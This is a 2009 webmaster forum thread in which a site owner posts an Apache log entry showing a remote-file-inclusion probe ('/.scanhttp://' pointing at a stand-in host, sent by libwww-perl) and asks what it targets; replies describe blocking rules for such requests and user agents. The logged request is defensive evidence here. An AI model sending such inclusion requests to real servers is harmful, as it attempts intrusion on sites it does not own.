Need to identify ".scan" exploit attempt

Forum Moderators: phranque

Message Too Old, No Replies

Need to identify ".scan" exploit attempt

Russian server attempted to connect using .scanhttp and upload an exploit

Wizcrafts

1:01 am on Jul 14, 2009 (gmt 0)

Today I saw a new exploit attack in my Apache access log. I can't find any information via Google, so I am asking here. What exploit vector is this fellow in Saint Petersburg trying to use? I've never seen this one before and don't recognize the .scan control file type. What module uses that file type?

77.221.x.x - - [12/Jul/2009:13:44:09 -0700] GET /.scanhttp://aneh.example.com/id.txt?%0D? HTTP/1.1" 403 137 "-" "libwww-perl/5.805"

Thanx in advance!

[edited by: jdMorgan at 1:39 am (utc) on July 14, 2009]
[edit reason] example.com for members' safety. [/edit]

Wizcrafts

3:57 am on Jul 14, 2009 (gmt 0)

Oops! I'm sorry about that Jim.

jdMorgan

5:16 pm on Jul 14, 2009 (gmt 0)

No problem...

Personally, I don't know what these guys are up to, but I block any request that has "http" in the requested URL-path or query string, and I block libwww-perl with only a few exceptions.

Too many exploiters, so little time: I say 403 and be done with it...

Jim

Wizcrafts

5:34 pm on Jul 14, 2009 (gmt 0)

I do block all http include attempts. This .scan vector is new to me and I can't find what application it belongs to. I'm just curious what they are trying to exploit by getting a hidden server function named scan.

BTW: Half of the XSS injection probes coming from the USSR have the user agent "Mozilla/5.0" - which I also block. I have not seen one legitimate browser that goes by that exact user agent.